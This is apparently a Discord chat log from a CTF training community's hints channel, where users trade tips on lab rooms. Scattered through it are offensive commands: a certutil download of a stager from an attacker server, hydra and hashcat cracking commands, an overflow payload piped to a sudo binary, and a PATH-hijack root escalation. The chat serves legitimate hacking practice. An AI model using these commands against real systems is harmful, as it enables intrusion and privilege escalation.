#room-hints
The room suggests you read the docs for the Python base64 module
do i need to write the code?
i did.. still can't come up with correct code
You need to write a whole program to do it.
It will be 3 loops
Each loop does a different decode
And you will use the base64 module, and 3 functions from that module
i did three separate functions..
Maybe you can do that. But you should really be using loops.
You don't need to define your own functions here
gotcha thanks for helping!
The order given is the order used to encode
i decoded it by each line.. but i got error saying :
There's only a single line
ok
Hello, i'm doing the Break Out The Cage room and i have managed to find the ||hidden message in the audio file using the spectrogram|| but can't actually ||see what it says||, can anyone help me?
scroll
Should be able to scroll along
i'm not entirely sure what you mean, can i dm you an image?
I have DMs off
is there a way i can put it in this channel without spoiling it for anyone?
I don't remember an audio component to Break out of the Cage....
There is.
Odd
Thank you
In the burpsuite room the #5 in the decoder and comparer.
" What can we load into Comparer to see differences in what various user roles can access? This is very useful to check for access control issues."
Not really sure what it is asking for here.
sigh.. figured it out.
On PS Empire room, trying to get the .bat listener onto the windows machine. Dunno why we set the listener to port 80 because now it's in use and I can't set a python http server so I could use certutil to download it
I could just use a meterpreter reverse shell and use download commands, but that feels like cheating. Is there another way?
That's not cheating. You could just set up a server on a different port and then download from that instead. You have 65000~ ports to choose from to do that kinda uploading/downloading thing @exotic rose
65535 to be precise
65534 if one is already taken
Hmm I tried hosting a python -m SimpleHTTPServer 5555 in my tmp directory with the file in it
On the windows side, did certutil -urlcache -split -f http://myip:5555/launcher.bat launcher.bat
Said the urlcache command failed
Any thoughts?
When you get an error, screenshot the error if you want help with it
a connection with the server could not be established that sounds like network issues to me
Your IP being your VPN IP?
nice
Any pointers on command injection for yotf?
@stuck fractal ?
@regal comet Boi.
Don't just ping me because you need help
If I could help you, and if I wanted to help you, I would have
I was under the impression this is a teaching place
Yeah
I guess paying for this service means nothing here
That doesn't mean I've done every box
I don't get paid to help you
Hell, I don't get paid to do anything other than make boxes
not you, me. paying to be a sub
I can't give you a hint if I don't know one.
but that's all you got to say
Being a sub doesn't mean you can get hints for a box that very few people have done, where the creator has given very few hints
The hints don't exist.
You can't have something that doesn't exist.
I mean, it wouldn't have contributed. At all.
Doesn't contribute = no reason to answer.
I guess paying for this service means nothing here
@regal comet correct. It's a community discord. Subbing means stuff on the site -- and it means you have a couple of extra channels in the discord, but otherwise it's not worth anything in the community
Someone else might want to give you a hint
And yeah, this is a volunteer job for us. There is no obligation to help, and in the end, there are 17 people who could help with that box, out of 900 in the room
Most of them aren't here
I am not upset for not getting help. I am annoyed that I am being ignored. that's all.
but its all good
Wonderful. In that case I'm going back to sleep
hi there
anyone able to help me with the room attacking kerberos?
for task 4 i am using the password list provided to crack the hash but it seems that the hash is not in the password list
If it says it is, it is. Your syntax is most assuredly incorrect
i am pretty sure it is correct
the syntax was just copied from the tutorial
this was given in the challenge
hashcat -m 13100 -a 0 hash.txt Pass.txt
i just followed it
I used John for that to be honest.
But that's because I don't have a GPU on this machine.
alright gonna try that
did you properly format your hash? Rubeus is weird and doesn't like to output hashes that hashcat likes
I forgot about that part. I remember having to delete all that white space from each line because of it.
thanks mayor
john worked fine
i was using impacket
so the hash format was normal
unlike with rubeus
anyone able to advise real quick on YOTF? ||is the command to bruteforce hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 80 -f -I -V -t 64 10.10.141.224 http-get / ||mainly wondering if the syntax is right..... it goes blindingly fast (obv because i put 64 threads) but not sure if i am doing this right
I mean. If you get the right username, that might give you a password
okay, thank you. will try harder
@inland onyx can I DM quick?
@wraith fulcrum what for?
(Thanks for asking btw)
Hi everyone, can I have some help on poloprivescfinal
Task 6.2... It's looking for a keyword but I don't know what it wants
@inland onyx sudo related
pwfeedback
Uh...
I mean, if it's asking for help with something then doing it here is fine, otherwise sure
6.2 Having read the information above, what direction privilege escalation is this attack? (8 letters)
have you done all the previous tasks?
the answer is in the long block of text
can someone please tell me how do I connect smb .. in yotf.. I got the username and password.. I am using smbclient but I can't
@indigo ridge you also need a share ..
can you show the command you're entering that's not working @indigo ridge? If we can see it we can help better
for yotf i managed to decode both files and got some kind of hash but cant cracked is it a rabbit hole ?
let's just say that I wish i hadn't spent as much time as I did on them @radiant violet
@median compass smbclient -L \\ip\yotf -U fox
your slashes are backwards @indigo ridge
I searched it on google.. is this for windows?
yes @echo thunder every time you reset the box the passwords change, at least some of them
ok
probably @indigo ridge I only use it on linux, on linux it's / not \
i assume your attack box is linux?
yes kali
oh, hang on, you also are mixing up two commands
smbclient -L is to list all shares, then you can't give it the /yotf part as that's a share
if you just want to login then leave out the -L
ohhh.. that's why It only lists the shares yotf and $ipc
is this correct
smbclient ////10.10.106.80//yotf -U fox
i would have thought that just smbclient //10.10.106.80/yotf -U fox would work
I entered this.. It asked for password..
smbclient //10.10.106.80//yotf -U fox
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
you have // before yotf
thankyou very much brother..
@median compass it worked
happy hunting
whatup ppl?!
somebody familiar with the "Advent of Cyber" room/Hackivity?
I'm kind of struggling with Task 6 (#3)
any hint (or help) would be great.
BTW I'm new at TryHackMe ..
thanks in advance
@jade plover have you decoded the cookies?
notice the decoded cookies it has some pattern
thanks for reply... I did
what did you get?
fixed part of cookie is:
v4er9ll1!ss
if you found the pattern then it is same for every user.. try to create the cookie for admin
@jade plover yep fixed part is this.. you have to decode it.. use burp suite or try to find the encoding.. I suggest use burpsuite
help blue room
using Burp or without?
its showing error can't handle
@jade plover with burp
help blue room
@cold tulip whats the error?
its showing can't handle while exploit
@indigo ridge Thnx man
@cold tulip I suggest you try it 2-4 times
its just straight forward exploit
set the remote host.. means your room's ip address
@cold tulip you're really not making it easy to help you, try sending a picture of what you're doing and explaining clearly what's going wrong
you mean Task 3 in room Blue then?
ok
@cold tulip I think you are having problem with metasploit.. I would suggest you should complete the metasploit room first
ok, so you type options and you see a SESSION option
then you type SESSIONS and you should see your sessions listed, you probably just have 1, it's probably number 1, but it could be another number if you've tried a few times
then you do set session 1
make sense? darkrider's suggestion to do the metasploit (https://tryhackme.com/room/rpmetasploit) room is probably a good one, it's a useful tool and worth getting a good grounding in
@ripe hedge I got it now, thanks!
Can I also get a little help on this one. I found 2 hidden directories and cracked a hash. I'm stuck on finding an email address to log in with
hey guys
@indigo ridge so wise.
@velvet wharf ??
a few have, but I doubt that they're talking much
It was like less than 20 people or something last night.
it's a hard room
can anyone give me a hint on how to find the web user for yotf?
As they answered you right above, only some 17 people have completed the room and they're probably not gonna give out hints
enumerate harder I guess?
In yotf room I got the web user and can ||upload/download files to the server. Ping my own machine|| but any hints pointers as to get a bit further ?
need a hint in the "rp: burp suite" room, task 10, can't seem to find any request that gives me a "set-cookie" header
it's a response that sets cookies
@mild eagle sounds like a job for a reverse shell...
I haven't gotten that far yet
@ripe hedge tnx Also the path I was heading down but not that easy !
I have a web user...and not much else
is the hash in the c*****.txt encoded multiple times
@echo thunder yep
just smb..and lurking to get http user pass.
I got a user
thats great..
any hints for Offline KOTH
Hi, I doing the CTF daily bugle and I have a shell on the machine, now I have found the file where the password stored under Webserver path but I can't SSH to the machine with this password, can someone help me?
I haven't done that machine in a while but that doesn't sound like the correct path to me
anyone decrypt the text inside the two txt files on yotf?
Nope
can you please ping me? I have a question regarding encryption
it is a ||base32|| text
I mean
It's not encrypted
Nothing about it is encrypted
Even once you decode, still not encrypted
wat
the text from the files
it is first ||base32|| and then ||sha256||
have fun
@stuck fractal
@echo thunder this won't get you anywhere
Muir told us about the creds files in yotf, they are /dev/urandom|sha256|base32, just meaningless noise
forgot the SHA256 part
that was days of my life btw, horror show those red herrings!
yes, finally
i imagine if there was 17 people that did it then i'm the 17th lol
sure
Help in authentication-2 jwt
same feedback as the last time @cold tulip, when you don't show us what you're doing or what you're stuck on it's hard to give help
@median compass 15 (16 now). Plus Pars, testing it, and me, making it
well that's top-20 Muir, I'll take it
@cold tulip Don't show flags.
Do you know where the flag should be?
Read the hint on the room. Where does windows store passwords (as a file)?
@cold tulip Well, I recommend doing some research and finding that information.
my system is trying hard to crack the hash from Daily Bugle but getting hot and nothing else, any known issue or should i choose a not-so-famous wordfile?
thanks @stuck fractal oh, i am missing my graphic card then.
Bcrypt doesn't care about GPUs
@stuck fractal cool to know, again thx. looks like i need to retouch GPUs' contribution in calculations. Any reference you wanna share?
that 2 js files are pain in the arse
wat
You probably just don't have permissions to view it
migrate to a system process
I have a problem with escalating privs to administrator on Retro. I know which exploit to use but im stuck on the last step. I tried a few things to fix it but they don't work
that priv esc is intended to be hard
@delicate plaza Check the pins in #650425164894568455
hey guys, just wondering if there's a directory in windows where you can download a file without getting errors like 'Access Denied' because i have no write permissions. So like in linux i could download a file to /dev/shm and get no errors?
google windows world writeable dir
ok thanks didn't know exactly how to word that
hey @stuck fractal so after trying to download the PowerUp.ps1 file to Useraccount\APPDATA\Local\Temp i still get access denied
i'll post some screenshots
Try a different directory
And just because I helped you once, doesn't mean you need to tag me the next few times
ok sorry about that
There's one that's pretty much always writeable by everyone
Public?
I found one in a single google search
i'll just keep looking, sorry for tagging
could you tell me what you typed in on google ?
i seriously can't find anything
Normally C:\Windows\Temp
i got access to this path is denied?
Eh, look in more places
What box?
you're probably told where
Corp? pretty sure you're told
the room is Corp Task 4
We will run PowerUp.ps1 for the enumeration.
Lets load PowerUp1.ps1 into memory.
Into memory
Not onto disk
https://tryhackme.com/room/hashingcrypto101 task6 1st ques I'm not able to find sha1sum the kali site only lists sum for latest 2020 versions not 2019
https://fleschutz.droppages.com/downloads/SHA1.txt found this site
but it does not match
BTW i realised what i'd done, cheers as always
again im quite newbie when it comes to windows
The worst in Retro is that i have set up a thing and when i wanna open other things it starts via the thing which i set up for it, but in eop it still doesn't want to ._.
see it has only the latest versions when i looked for older versions it does not have the checksum in it
It's not directly on the page
hmm ok
okay i'll try searching more thanks
I have a question for y'all, what do you guys tend to look for after finding an LFI vulnerability?
Unless that's for a specific THM room, wrong chat
If it's not for a hint for a THM room, it doesn't go here.
For those who want only hints on rooms
ok
Can i dm someone who pwn Retro with question if im doing box right ?
@delicate plaza can I dm u?
yup
I just wanna be sure if im doing something wrong or if the machine is broken
Or just screen to confirm if something should appear or not
So I think I found the way to root before the way to ||jjameson|| on Daily Bugle lol, I did see ||/var/www/html/libraries/joomla/http/transport/cacert.pem|| through linpeas, but having trouble finding out ways to exploit it. Any tips on moving from ||apache|| to ||jjameson||?
Look around for possibly some || plaintext credentials ||
@robust nymph also look closer at your ||linpeas output|| and I think you may find something interesting
I'll definitely do some digging and get back to you, thanks!
Ahh shows that I need to look at my ||linpeas scans|| more in depth, very well hidden in there. Thanks again for the tip!
any time
And sure enough the way I found to root worked as soon as I pivot over, Very awesome box!
Daily Bugle is one of my personal faves.
I have a single problem with it
Hello guys, I just have a quick question about skynet, I'm new and I wouldn't want to start spitting spoilers even though there's a walkthrough. Would anyone be able to help me?
Hi Princess. Best bet is to ask for a hint specifically. You can include what you're currently stuck on, and what you've tried unsuccessfully.
If there is anything we consider a spoiler we can ask you to remove, or have it removed if needed.
ok! this is for the oscp room, I found the directory for "My dyson" and connected to it, but when I do an ls I do not find anything about his wife or content management
just a whole bunch of pdf info
So if I remember correctly there are a few different directories there to go through.
||download them to your Kali machine to go through them easier||
I would also check the other shares.
For yotf room. I found the web user. Maybe someone is able to give me a hint on the box. || I am not sure how to execute commands in the form I found. I tried injecting the POST request using Burp, but I am not able to execute commands or perform LFI.. ||
ok, I read the l*gs and already logged into smb and Mr dyson
Ok, but you have what you need from the logs. Don't get bogged down in the shares too much. Go back and scan/enumerate some more to find additional services you may be able to take advantage of.
If you have access to Miles share, that's the other half of the challenge.
Now put together what you found in the ||anonymous share and in Miles' share||.
I so need a hint please with a linux challenge. [Task] #10 . part 3 regarding split. i do not understand and from the hint that was suggested i can use sed and i just dont see how that is possible?
@craggy owl the man page for sed or google is your friend here for what you need
that's the thing, miles share only has titles of pdfs
I know that if I say more it's going to sound as a spoiler and I could get banned
@white salmon I don't believe that's the case. Enumerate harder
I'm such a noob
Example ^
||y'all are awesome||
We all started there at some point no worries
@white salmon Just don't post answers/flags directly.
We don't enforce spoilers other than "Be a decent human"
Does anyone remember what smb enumeration cheat sheets they used? obviously I'm googling wrong! and I'd like to be able to find the answer myself
||so obviously I've done smbclient \\10.10.58.81\milesdyon with the pass I found in squirrelmail||
and then ||smbclient -W WORKGROUP -U milesdyson //10.10.58.81/milesdyson ||
and I get access!
but I do not know how to enumerate more from there
i so need a mentor if one can help me. i just want to learn and have a passion again to code and i want to keep it going... sorry if this is the wrong room im just asking for help in learning..
Mentors offer specific help with rooms or the VPN.
yes i have a question about a room
If you want to find people to learn with, #689615473620287603
If you want help with a room, #room-help
If you want a hint with a room, #room-hints
okay.. i have been there but seem not to get help but i am still all new and will figure it out
sorry
||I'm really sorry, it's just that it has already been 3 days and there is a part that says "let's log into Miles share" and even though I'm already logged in with username and password, I cannot get it to match what the walkthrough says||
head to #room-help and show a screenshot of the share
@white salmon, it's very annoying when you're trying to solve a hacktivity and you find out the problem is not your skill, it's a bug in the room.
This wasn't an issue with the room in this case
No, this was me being stupid :/
I was getting the letters N and D confused
Which room are you doing?
It's solved, but Skynet
Ah, okay, just wondering.
I'm trying to do the room Agent-Sudo and it's asking me for a zip file password in task 3 question 2. But I can't find it in the FTP service.
I can only see a .txt, jpg and png.
I have used Stegcracker on cute-allen.jpg but that didn't give me a password.
I mean, have you tried something like stegoveritas to see if there is even anything there?
Would steghide suffice?
Stegoveritas detects steghide, that's the goal
It does a bunch of steg detection and extraction techniques
Hey, I am going through BP Networking and I'm having a very difficult time finding the answer to
A third predominant address type is typically reserved for the router, what is the name of this address type?
I've tried numerous answers but I can't seem to find any information, can someone point me in the right direction?
ipconfig in windows will tell you it
Oh I don't have a Windows machine
I'll try it in wine
Ok nvm I'm dumb, thank you!
You're not dumb
yeee I knew it once I saw it, just couldn't think of the word lol
I just extracted cutie.png with stegoveritas but nothing of interest in there.
Don't worry. I'm really stupid.
-.-
You're not
Hey guys, I hope you can help me. i'm stuck to the answer in CC: Pen Testing: Task8 #7 What option sets the architecture to be exploited? It's 4 characters and I'm a bit confused, 'cause i tried everything.
hi!
i'm stuck for a long time in linux challenges flag 26 (Find flag 26 by searching all files for a string that starts with 4bceb and is 32 characters long).
I tried to do all kinds of command variations and nobody worked for me .. For example:
||grep -x '. \ {32 }' / * -R -s 'Permission denied' -i '4bceb'||
I would love for hint to tell me what I'm doing wrong, thank you!
hello everyone, I'm stuck on ICE today https://tryhackme.com/room/ice
Deploy & hack into a Windows machine, exploiting a very poorly secured media server.
Hi Guys,
Anyone has an idea on the Network Services room Task 4 #8
I already have the id_rsa, where do I need to pass it? Been stuck for a while.
For ICE, MS17-010 looks promising but, it can't find a pipe using both py and msf exploits
The recommended Icecast msf module doesn't work off the bat. A listener is created but nothing connects back
Task 7 Q 7
I was just trying other angles
ah ok
they are talking about the icecast msf module but i cant get that to work
am I missing something? use exploit/windows/http/icecast_header
set LHOSTS x.x.x.x
set RHOSTS x.x.x.x
exploit
Started HTTPS reverse handler on https://10.8xxxxx
[*] Exploit completed, but no session was created.
i can upgrade from in the shell
I'll try that too
i have a gcc question too. I tried doing it without MSF and I downloaded 573.c ant then ran
gcc -o 573 573.c
chmod +x 573
./573
and it says:
Failed to execute process './573'. Reason:
exec: Permission denied
have you seen that before? Also I'm using fish. Not sure if that makes a difference
no clue
Ok, I'll mess with it later. Thanks for the help
Is that the way you're supposed to compile it? Read the exploit, it might not be
Interesting
been trying to generate my own with msfvenom
but none will stick
tried bind / reverse /add user
Yotf: Got access, reverse shell, and did some enumeration and found something interesting but need a hint to exploit after I got a reverse shell. Let's say || there is a difference in local ports and public ports||
sounds like you're on the right track @mild eagle
what would you do to a port ||if you could see it from your attack box?|| then think about how to do that in your case
@median compass yes i just dont know || how to proxy that port to my attack machine - my Google fu is weak today||
you could look at ||socat|| or perhaps ||upgrade your shell to meterpreter and look at the options baked into that||
||i just wanted to join ||in ||on the spoiling fun||
@median compass tnx Think that will get me a bit further
I also got access to that port but still dont know what to do with it 
@median compass || could it be something with portfwd been struggling to "the do the thing" once I've used that cmd||
@prisma bronze yotf ??
Hi can anyone guide me in the BP Networking room. I'm stuck only 1 question in the entire room.
"Of these addresses two are reserved, what is the first addresses typically reserved as?"
@halcyon pumice research what the 2 reserved IP addresses are in a network
don't spoil the answers @halcyon pumice
hint on tomghost? I ||rerouted the tomcat server (on port 8009) so that i can log in locally, but its not default credentials (that I can find)|| is that the right port to try to exploit or should I try ||port 53||?
what are usually some default credentials @oblique cliff
there is a specific exploit you need to use for it
it's in the room header, or whatever is called
i cropped it out. have a look there
thanks
no problemo
@ me if you get stuck again
it gets a little harder after the foothold but should be manageable
gotcha, turns out thats the exploit i was trying i just couldnt get it working, ill #tryharder
but i have to eat dinner now so may @ you in awhile
alrighty i tri hard first
@past night im an absolute moron
the reason it was giving me only an option to give a password is cuz it was asking for my kali password to get permission to start a service lol
but it was right other than that stupidity
slowclap
We all make mistakes, don't beat yourself up over it
its ok im tough enough to fight back 
well, as i usually say 'I am the mortal instrument of my own death'
excuse me mr mortal instrument of your own death @past night , but the ||usual tomcat default credentials dont work and those have never failed me for tomcat|| so i am both disheartened and lost
Is this ghostcat?
Oh Tomghost.
Same thing.
What have you tried so far Bob?
@oblique cliff
I've tried the usual ||tomcat default creds list|| but that didnt work, so i tried brute forcing with rockyou with username ||admin|| but nothing after 5 minutes so i stopped that one
and then I found exploit ||48143|| but i cant get it to work
yea, unable to get it to work unfortunately
How did you attempt to run it?
10.9.1...
but i can access tomcat on localhost rn cuz i set it up that way
Try it my way and see what you get.
Also, the vulnerable service isn't actually on port 80. You're looking at the ||ajp|| service, which is on 8009.
right, but I ||was forwarding it to my local machine on my port 80||
This isn't an exploit that is like that. It's mostly a file read vulnerability.
because I was ||forwarding it|| or whatever it is im actually doing with the service I thought that ||i would have to exploit it through my machine|| hence using ||that IP|| when doing that
It's more of a file content disclosure vulnerability. Maybe there is a way to exploit it like that, but I'm personally not aware of one. And in the case of this machine, they are looking very specifically for the output that comes from that exploit being run correctly.
I get that, but I thought the exploit was going to take advantage of tomcat, which is either being run on the remote machine port 8009, or my machine port 80
i guess i overthought it
but anyway, thanks ^^
wait so did I not have to set up this forwarding at all?
Not really. It's exploiting the Jserv service, not Tomcat.
No forwarding necessary.
oh thats actually kinda funny, cuz ive been brute forcing this since i set it up to forward to me, so i thought thats what i was supposed to be doing haha
Not in this case. But that's interesting thinking.
damn, went down an unintentional rabbit hole
brutal
its ok i deserved it
alright back at it, still fumbling around as user... i assume I need to find ||a password somewhere to decrypt this pgp file||, but hunting around couldnt find anything. Hints on where to look if thats right and if not then what to do otherwise?
still tomghost^
Sure. Check the ||skyfuck directory||
Oh dur. Need to read better.
||gpg2john||
There @oblique cliff proper hint.
didnt even know that tool existed, I'm so behind the cryptography times
||use the correct file||
just so i feel better about myself i feel the need to say i did use the correct file without being prompted
got root, thanks for the help mayor!!
and thanks for the wonderful motivational speeches @past night
question mayor, for something like that where I had never heard of that tool gpg2john, is there something you do to discover new tools for the appropriate situation? or is that just experience?
Think I was probably as stuck as you were and looked at the guide. No way to know what you're seeing if you don't know what it is or how to use it.
thanks!
For PS Empire stagers, what's the difference between the BindIP and the Host? My stager works when I set both of these with my host ip, but not with just Host set
For network services room, telnet section, is the telnet port closed on purpose?
Hi Jyuken. No need to ask in different channels. When someone who sees your question can answer it, they will. The community is super helpful.
In this case, looks like you should review the room instructions. Looks like you need a port other than the typical one.
@patent token so even though the section is all about telnet, it may be a different port?
You aren't required to keep a service on its common port.
It's actually common for network and system administrators to use obscure ports for services.
Quite common, in fact.
You're welcome.
Maybe a stupid question but when running a portfwd from a meterpreter session does the remote port need to be exposed to the outside??
i am trying to get into jack so i decided to rock with jack on a xmlrpc stage. Am i going right ?
@mild eagle if you're connected to the vpn then no it won't need to be exposed (or the THM virtual machine)
@dusky vigil okay tnx, guess I must be doing something wrong then
Anyone get this bug when upgrading their shell?
is rockyou okay for jack, i am bruteforcing since morning without luck
Most rooms tend to use rockyou yeah
@white salmon Can you share your options with us?
@keen willow Rockyou won't work for Jack.
@tidal sedge I realized that, so, is finding the right wordlist what makes this room hard?
or am i entirely on the wrong path, I am bruteforcing coz in the forum i read a shorter wordlist would work.
From my point of view, finding the right wordlist can not be the point of this room. I don't think it's the reason why it's hard.
It's a common wordlist, it's also quite small in size hence the bruteforce will be fast .
Can you tell us, which other list did you choose?
nmap.lst, john/password.lst, fasttrack.txt
next would be wordpress-attacks-july2014.txt
@dull marlin can you please pm me some hint.
@dull marlin 10-million-password-list-top-1000.txt, xato-net-10-million-passwords-10000.txt these are currently on work.
Anyone able to assist with the reverse engineering room? I see what it's comparing the entered value to "cmp eax, xxxxx" but when converting the "xxxxx" hex value to both base32 and base64 I'm met with an incorrect answer. Any hints/tips for crackme2.bin
On linux Challenges when trying to find flag26 i've tried running find / -type f | grep -rl "^[4bceb].{27}?" and find / -type f | grep -rl "^[4bceb]", both display the same 4 files and after manually going over them i don't seem to be able to find it, any hint to the right direction?
@thorny pond right now you're grepping the file names. you need to grep the contents of the file
I would research how to use find and then grep the contents of the files
ahhh that makes sense, thanks!
I just did agent-sudo, and even though I could only do half the room by myself, I loved it. :)
Props to DesKel
Yea I enjoyed agent-sudo as well
@proven bridge do you still accept dm for carpe diem? stuck on getting second flag
Is there no writeup for Year of the Fox?
Muir made the post protected to spite us. >.<
hey.. so in the latest box my exploit is working in local.. but it's not working inside the box
I added ;cat at the end. but it just breaks.
yes
I had many iterations of my exploit work locally but not on the box
Mind showing how you're passing the payload to the program?
Oh wait, I should ask what stage are you on first lol
root flag
with python..
||(python -c "print('A'*N+<payload>)" ;echo "";cat) | sudo /uid_checker||
though working in local?
hmm.. lol.. sorry.. but I don't know enough about binexp to grasp what u're trying to say xD i will just research and read up more
I don't know binex too, I got through this by gluing programs and looking at docs
yeah so using ssh not rev shell
@wooden mist ohk lol
thanks
@wooden mist so one thing even in the box it goes into the required function(cause it prints the msg). But the shell is not persisted.
just wanted to mention that.
The persistence depends on your payload
oh ohk
for year of the fox machine got user fox
is pivoting to the other user the right way to get root?
Hi!! Could anyone help me with the Buffer Overflows room? I'm struggling with the last challenge
How do I decipher the cipher.txt in the room Year of the Fox?
Advent of Cyber, day 11. Anonymous FTP. Nearly all commands give me "500 Illegal PORT command". Passive mode doesn't work either. Any ideas?
@floral olive rabbit hole
Switch vpn servers @radiant dew it's a known bug to happen at times (:
@steady stratus Do you mean change machine?
Ahh noo. If you look on the access page on the THM site you can change what VPN server you're connected to
Change to a different one (I.e. from eu regular 2 to regular 1)
If it's your first time changing over you'll have to regenerate your config file and use that
But any further switching you shouldn't need to regenerate it again
Awww I don't like my new IP
But at least it works now, thanks @steady stratus !
Ayyy nice one hehe. It'll take a bit of getting used to
I had something like 10.10.11.23 something near to that sequence
If I change it back to my local server, will the IP stay the same? And I can use the same .ovpn file from now on?
Your ip should remain the same and you should be able to use the same config file now yes
It's just the one time if you need to switch servers is all (:
@wooden mist can i pm you about davesblog? i have ||pwntools working on local but not remote|| wanna know how you fixed it.
Sure
Hi, can someone give me an idea regarding Intro to Python room Task #12
what's the issue?
how can i pass the result of the loop to the next loop?
save it as a variable and pass it on?
pls don't post answers here
remove that pls
and instead of print do return
why does it say return outside function?
def somefunction(code):
    dosomething
    return value
should be inside the function
same indent
so all my loops should be inside one function?
can I dm you real quick?
sure
Can anyone help me with JVM reversing task 6?
which room?
ah, haven't done that one yet
Currently doing LazyAdmin. I found the user flag by spawning a reverse shell.
I see that SSH is open and I found the db credentials, but neither do I see the port for mysql open, nor can I think of a way to privesc. Any hints?
where can you login with those creds?
exploit that
oh wait you already have rev shell
enumerate
@real storm you don't have a reverse shell yet do you?
If not try directory busting some more
To find where you can use those credentials
I found the login creds to the webportal, uploaded a shell and connected to it with nc
I'm gonna look into this in an hour or two, there's codechef lunchtime in 5 mins so
@proven bridge do you still accept dm for carpe diem. stuck on getting second flag
@eternal wadi Absolutely
Hi
just ask your question
guys
in Cicada: 3301 vol1 by cryllic, i always input ||cicada|| and ||Hm5R_4_P455mhp453!|| in the vigenere cipher but then i get ||Fe5P_4_P455jhn453!||
try the opposite way
OOF
that was actually an error on my part then I was too lazy to fix it and just made it part of the challenge
use cyberchef and go the other way
the key needs to have only letters
ohhhhhhhhhh
wait
ahhh
nevermind i got it thanks
What is the 11-bit arbitration ID in Hex for the turn signals?
Hey guys, re yotf's root flag; did anyone get it in the way that was intended? I understand the vulnerability used by others has been patched.
hey all - stuck in kenobi on the last task.
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu
When I execute the latter, I still get the standard status check message - no root terminal. I've bounced the machine 3 times and still the same results. Any idea?
Which option are you selecting?
option1
Also, make sure you are in the tmp directory when running those commands.
If I remember correctly that is what I was doing wrong when I did it.
Don't be. Do you understand why it wasn't working?
i had created /tmp in Kenobi's home path.
Yep. And when you were creating curl, you weren't adding it to the /tmp directory. So when you fired off the /usr/bin/menu program, it was going through that PATH, but not finding your curl payload, so it went to the next location it could be in.
So eventually it found the correct one instead.
That makes sense.
Had you declared /home/kenobi/tmp in the export PATH= statement, it would have worked if you were placing it in the /home/kenobi/tmp directory you made.
I should've thought just a little bit more about the problem and I would've caught it.
I was stuck for about 20 minutes the other day on it while I was going back and reviewing some rooms. It happens.
Good learning opportunity/lesson. Glad we got it sorted out for you.
Thanks for the help!
You're very welcome.
https://tryhackme.com/room/windows10privesc
Someone please help me in task 16 please
@regal comet writeup is now out
So, I am doing Custom Wordlists task 4 question 2 and I have appended an ! to the end of every word on rockyou.txt but the password is still not cracked. Am I doing this wrong?
Have not done the room, but just going to say that perhaps you added an extra space or something.
Not sure.
Every time I check it the ! was at the end with no added characters. Using the hint to verify and the commands it shows as an example says to add a suffix. Hmmm. Might need to go back to the drawing board
Perhaps. Not sure man, sorry I can't be of great help.
Nah, all good. Figured it was worth an ask just incase someone had an idea
For YOTF?
@lean rover Mhm
Very nice! Hoping for it to be a good learning experience once I get stuck.
There are some interesting techniques in it (imho), although the way they're put together isn't hugely realistic.
No full on "CTF-only" things though -- not in the actual challenge. So no stego, or encoding or anything like that
Not unless you fall into a troll
I was doing the hydra room and cracked the ssh password but the first task. I am trying with this :
|| hydra -l molly -P /usr/share/wordlists/rockyou.txt http-post-form "/login:username=^USER^&password=^PASS^:F=Found" http://<ip address> .||
can someone give a hint where I am wrong, I have been stuck for a while
Well, for one you don't have an end quote...
Oh, it appears you do, my apologies.
The http://ip caught me off guard. Not used to seeing it in that place. Either way, did you use burpsuite to grab the login request?
I can do this with burpsuite but I want to do it with hydra
yes i have the request in burpsuite tool
Okay, can we take this to DMs?
yes
Resolved.
^yotf? yeah the intended root route is .. like.. wow
I looked at the binary and started testing but after powering off the machine twice and needing to start from scratch was a bit too much for me
But I guess that's what separates a 'good' tester from a great one
Thank you
Oh wow, I thought the shutdown binary was a troll. I never got root in the end! What were the creds/cipher files for?
umm.. let's say u got trolled .. big time
@wispy girder trolls
Nice write up! I couldn't find a way to portfwd the ssh port without meterpreter. Never thought of just uploading socat!
socat seems like a very powerful tool
Socat is honestly my favourite tool in existence
And that isn't an exaggeration
It is literally my favourite piece of software
I actually first time used socat on that box..
Runs on anything, and has virtually limitless potential
thought it's an alternative to nc..
i always used chisel for forwarding ports
I've never used chisel. It's something I really need to look into, given how much I'm loving tunneling just now.
I always use chisel too, does socat have socks support?
I'll check it out, chisel is a bit of a pain for socks
As I said, I have yet to find anything comparable to socat
Heard good things about chisel
But the ease for things like encrypted shells in socat is just mental
Pulling a full tty shell out of the box is also a far cry greater than the (initially) volatile netcat shells too
iirc there was an unintentional priv esc that you had to fix? What was that?
guys I need help with Steel Mountain. I'm unable to identify which ||file server|| is running on ||8080||.
thanks in advance
@true widget have you tried directory busting to see what's there?
Or if you're on the file server already have you enumerated and looked around to see the title
@oblique cliff can't I find it using nmap by running it specifically on port ||8080||?
nope I haven't used the directory buster yet
Maybe try that out then
@oblique cliff
Try looking at source code
@solemn smelt didnt find anything
Look harder
or wait I might be thinking of another room never mind
No I'm right look at the source code
@solemn smelt okk I'll try harder
you could also look at the information given to you on the webpage itself and get the same result
@solemn smelt can't find it by looking at source code
Steel Mountain. Found the exploit with msf... used it, configured, and ran. I get an error when sending the payload.
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
look for the creators link in the source code
also make sure you're looking at the source code of the file server
@solemn smelt I can't find it
@true widget it says it in that pic you sent
And as cryllic said the source code says it just look closer at the page
@rich gust that's just a warning you can ignore it. Did you set your lhost?
I did. Exploit completed, but no session was created.
Can you show your options
Incorrect payload
oh snap. we need TCP for this one
@oblique cliff ||HttpFileServer httpd 2.3||?
Try it out and see if it works
yep. that's what it was.
Try it out and see if it works
@oblique cliff i tried ||favicon http file server|| but it also didn't work
I need help for the decoding in Year of the Fox any hints for me?
@true widget just keep playing around with names you're on the right track
@oblique cliff found it
Awesome!
Tripwire, you're going to need something other than the default payload for basically everything Windows related until Rapid7 patches the issue.
@oblique cliff instead of using metasploit to get an initial shell can't I directly use it with python
@true widget there are several different approaches to getting an initial shell on that box
My 100% manual method is fun, but a bit advanced.
@oblique cliff should i use the exploit on ||8080||?
Hey there Myk17. You should probably try to do some of it on your own first, and if you have issues, come back for a hint.
If you're unsure what you're doing, which is ok, we really do recommend trying some of the introductory rooms first. Things like RP:Nmap, RP:Metasploit, etc.
Additionally, please check the writeups that are in the room first as these will generally have the answer you're looking for, and do a better job at showing/explaining the task you're currently on without trying to do it through a chat box here.
@patent token okkay buddy
If you're unable to solve your issue at that point, stop back in #room-help and another community member or one of us Community Mentors would be happy to help more.
